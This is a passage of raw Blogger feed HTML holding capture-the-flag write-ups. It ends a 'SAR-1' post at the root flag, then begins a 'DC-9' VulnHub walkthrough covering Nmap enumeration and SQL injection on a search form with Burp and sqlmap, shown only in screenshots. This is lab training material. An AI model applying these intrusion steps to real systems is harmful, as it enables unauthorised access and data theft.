shell&lt;/b&gt; is achieved:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;210&quot; data-original-width=&quot;686&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjKQMHWw7SBRBtIMkkfjsvpctk9fdB0DJx_MnSJRRc_n51yWY5GUscpqu6zfVg_2iqEhBh12cIvXZoiVHIx2sk4FvK-tlxYE2rEPfc2EyrXz0iC4aLpdTVzXiY1dgfP7MDQPh9NjBnyow98p2bCu1_mFisliN9k7fQgAHcPVIL1ji8iITakXZ17lPWpJw=s16000&quot; /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjKQMHWw7SBRBtIMkkfjsvpctk9fdB0DJx_MnSJRRc_n51yWY5GUscpqu6zfVg_2iqEhBh12cIvXZoiVHIx2sk4FvK-tlxYE2rEPfc2EyrXz0iC4aLpdTVzXiY1dgfP7MDQPh9NjBnyow98p2bCu1_mFisliN9k7fQgAHcPVIL1ji8iITakXZ17lPWpJw=s686&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirC041L-4nQDiUVLrkpRdb6_4iqd5srrccAU7e7wRCA1b3huyIvieWWwR3a_wszM2nErVrJD5gYku79zMdT-8Y6abjjDX_ds2kLKQZTeeux28xMxgG-U5HGohGTpEV0pzYHCovp_562DEgPvmuEsCdqWJnTpR4KvwLV6kNE5Xy2GL4MhfsWnkmqCCH_w=s381&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;80&quot; data-original-width=&quot;381&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirC041L-4nQDiUVLrkpRdb6_4iqd5srrccAU7e7wRCA1b3huyIvieWWwR3a_wszM2nErVrJD5gYku79zMdT-8Y6abjjDX_ds2kLKQZTeeux28xMxgG-U5HGohGTpEV0pzYHCovp_562DEgPvmuEsCdqWJnTpR4KvwLV6kNE5Xy2GL4MhfsWnkmqCCH_w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/455222361896924339'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/455222361896924339'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2021/11/sar-1.html' title='SAR-1'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEh3w_WIkT45G0lr7YI8rhNXIWnzCJCE8heWhrCoMEiOYFXGQerlbCMRPpA_BRdr9f5bZN7bxuo84DGURW4UufAFvqW5J4JUbDuK-sx_lZEbUeUptaws32rL_sPE9N6UaRLEnOC5Rt36_-mDjoRBxVJrEKDxHULsr4a3IS3qxUcPZtrqV1FSeXeGVteqDg=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-4403026298744482641</id><published>2021-11-06T08:47:00.047-05:00</published><updated>2021-12-12T11:33:44.632-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>DC-9</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;DC-9&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqqeQYSWvZo24b4B7N9KxpEXdkV3QXHxlG8ORPbO6KUckc3i-YT2jmBnZTyCTCyCkRGvXzjEfeWryYjHu2uxygyNgqlHUoan57cIZeEll4WLpx-HtCW_3oKvuG23YxbR81j8aBya5vx36/&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;216&quot; data-original-width=&quot;694&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqqeQYSWvZo24b4B7N9KxpEXdkV3QXHxlG8ORPbO6KUckc3i-YT2jmBnZTyCTCyCkRGvXzjEfeWryYjHu2uxygyNgqlHUoan57cIZeEll4WLpx-HtCW_3oKvuG23YxbR81j8aBya5vx36/s16000/screenshot.13.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine DC-9 from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- DC-9 can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/dc-9,412/&quot;&gt;https://www.vulnhub.com/entry/dc-9,412/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Once downloaded DC-9 and extracted with VirtualBox:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxy3L5_xoyYBMk6BMKERAIdLoGBL3tzfQ5qgqIR4Y6xhG4vzQh6fxjCUE9jzX95Gbc-qKmTrAufqDdItxYoyeTT_-XzAndrzIKehe80HxJYl2D-W2x-W86bsmPHQ0nrz-M8J_if8K6HV2m/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;159&quot; data-original-width=&quot;366&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxy3L5_xoyYBMk6BMKERAIdLoGBL3tzfQ5qgqIR4Y6xhG4vzQh6fxjCUE9jzX95Gbc-qKmTrAufqDdItxYoyeTT_-XzAndrzIKehe80HxJYl2D-W2x-W86bsmPHQ0nrz-M8J_if8K6HV2m/s16000/screenshot.1.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- IP for DC-9 is 192.168.1.14:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe7RFkRwt9p0rC9vm25SaP82XzMPtYbyMdH5MGb_OemRD3i8Gx3FrWWgFIteNFFgTmOf49jr08ufLQYC_77OxLNc-ERO4Q6AQZBbx6nrFrL7rGyO7IakHwnRI-85AsfqY8iP2Es8K3cKUc/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;437&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe7RFkRwt9p0rC9vm25SaP82XzMPtYbyMdH5MGb_OemRD3i8Gx3FrWWgFIteNFFgTmOf49jr08ufLQYC_77OxLNc-ERO4Q6AQZBbx6nrFrL7rGyO7IakHwnRI-85AsfqY8iP2Es8K3cKUc/s16000/screenshot.5.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi36BhquOwj8Dcufgj0n9SDxlR5-Q1bynnQh0CpIYm77vyPXGnfrenb4vWzYPwNJJjVzJyXNoWN7G6Bn_jw9e4zbd5SAMA0ywwvtQBD_b83DtMJNRO9uzIV_KxLud7UEetuUB7PlnqurcsU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;318&quot; data-original-width=&quot;930&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi36BhquOwj8Dcufgj0n9SDxlR5-Q1bynnQh0CpIYm77vyPXGnfrenb4vWzYPwNJJjVzJyXNoWN7G6Bn_jw9e4zbd5SAMA0ywwvtQBD_b83DtMJNRO9uzIV_KxLud7UEetuUB7PlnqurcsU/s16000/screenshot.4.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Scanning with Nmap, port 22 is filtered and port 80 is open:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilApfwZojrs0ZZj4LEEQ_dKzCruVXFx-w4-Ot16xPYJsn0NqUpJKncOryeexfKE8sCuHdr0hl7bkzzoWzKHghcTHmAd6M7lTXErOYvGD-63aGFfic662ZPzkgDZUn_AzCBXleIRfdMGJa4/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;261&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilApfwZojrs0ZZj4LEEQ_dKzCruVXFx-w4-Ot16xPYJsn0NqUpJKncOryeexfKE8sCuHdr0hl7bkzzoWzKHghcTHmAd6M7lTXErOYvGD-63aGFfic662ZPzkgDZUn_AzCBXleIRfdMGJa4/s16000/screenshot.14.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiekomRdEzYFlvR7AE5AAbHLGiYXCwlq1yDtFWWlMUXhgLfUQSueqzgpZbrWHC36HC-IKkUlC2KPVhOPHbMxC1HCENIqRAtSuQUdw33iy4jWiXXWVlvXO6VyQABWbIAir99qeX9MPjAysUm/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;242&quot; data-original-width=&quot;572&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiekomRdEzYFlvR7AE5AAbHLGiYXCwlq1yDtFWWlMUXhgLfUQSueqzgpZbrWHC36HC-IKkUlC2KPVhOPHbMxC1HCENIqRAtSuQUdw33iy4jWiXXWVlvXO6VyQABWbIAir99qeX9MPjAysUm/s16000/screenshot.15.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Checking the web server:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2AM76tTx-yPDu5y9HWjn4ApJxWkettcXmNtgy7etesO-Hc0lu6ff6FPNtdXdOFxpxVlpMQWiIzesUBshH7FhqDesCEPnqz32iH73o5FFshptpBiaxlLh6M8acI4FNC-r8KV6zotc0vfND/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;464&quot; data-original-width=&quot;794&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2AM76tTx-yPDu5y9HWjn4ApJxWkettcXmNtgy7etesO-Hc0lu6ff6FPNtdXdOFxpxVlpMQWiIzesUBshH7FhqDesCEPnqz32iH73o5FFshptpBiaxlLh6M8acI4FNC-r8KV6zotc0vfND/s16000/screenshot.3.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;Manage&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsKagnqG-0-OnCFWm3W7hklRnoViSzpym7vwILTQIpIrcbNHjF8vGsOw_OZzBkHNDLtc3hbmYU8sxnCYPGCtlpkpz5KGNFbWzI5GFIoF9lbvPP4D65abQy3vIzqOCN4wl4yE7D3lAlqg49/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;616&quot; data-original-width=&quot;795&quot; height=&quot;496&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsKagnqG-0-OnCFWm3W7hklRnoViSzpym7vwILTQIpIrcbNHjF8vGsOw_OZzBkHNDLtc3hbmYU8sxnCYPGCtlpkpz5KGNFbWzI5GFIoF9lbvPP4D65abQy3vIzqOCN4wl4yE7D3lAlqg49/w640-h496/screenshot.6.jpg&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s explore the form&amp;nbsp;&lt;b&gt;Search&lt;/b&gt;, intercepting with &lt;b&gt;Burp&lt;/b&gt; and saving it:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxUJCX8SbzRRDgkjSXr_oTIDfZfXhuKrhc9BH9KHT7F0DvLLr_dZ28RfOfWzlS4d_OPPx2WJnMSVVWzvGLo125gUGub22I0POw13P4RmR25DimTdx954YyDsG0RHTI2-x1iV6ESzjALiI6/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;535&quot; data-original-width=&quot;816&quot; height=&quot;420&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxUJCX8SbzRRDgkjSXr_oTIDfZfXhuKrhc9BH9KHT7F0DvLLr_dZ28RfOfWzlS4d_OPPx2WJnMSVVWzvGLo125gUGub22I0POw13P4RmR25DimTdx954YyDsG0RHTI2-x1iV6ESzjALiI6/w640-h420/screenshot.9.jpg&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrphm7_BPoQyPcJqU4wGZRLzrhmHn6IGXA2sj8UzdAIqe8FKUg7N8iSdyXJriCw8DVr0G1lhv7pMWwTAL9y1802p5IjW13tSFXblQ4QHcPsn8BeSAJmdWXTwo3vMiIKctkLVvCiGl4bTOF/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;604&quot; data-original-width=&quot;611&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrphm7_BPoQyPcJqU4wGZRLzrhmHn6IGXA2sj8UzdAIqe8FKUg7N8iSdyXJriCw8DVr0G1lhv7pMWwTAL9y1802p5IjW13tSFXblQ4QHcPsn8BeSAJmdWXTwo3vMiIKctkLVvCiGl4bTOF/s16000/screenshot.1.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Forms are prone to Injection Attackts, so let&#39;s use the saved item with &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;Sqlmap&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; to find a vulnerable injection point:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfMT25ORZZDMpMkTM2NeMmEA1HqxxvuRmaNc9_0PCvS_m4P4dKj_S5b7_R8VSiqTfEiZovLeGaZMR3H_VprQyQs9s70clcWLO3ppwoc2_S6Cu9C-hEKKexVDW0Pxd0u77nO8ghafvKESvM/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;268&quot; height=&quot;64&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfMT25ORZZDMpMkTM2NeMmEA1HqxxvuRmaNc9_0PCvS_m4P4dKj_S5b7_R8VSiqTfEiZovLeGaZMR3H_VprQyQs9s70clcWLO3ppwoc2_S6Cu9C-hEKKexVDW0Pxd0u77nO8ghafvKESvM/&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a 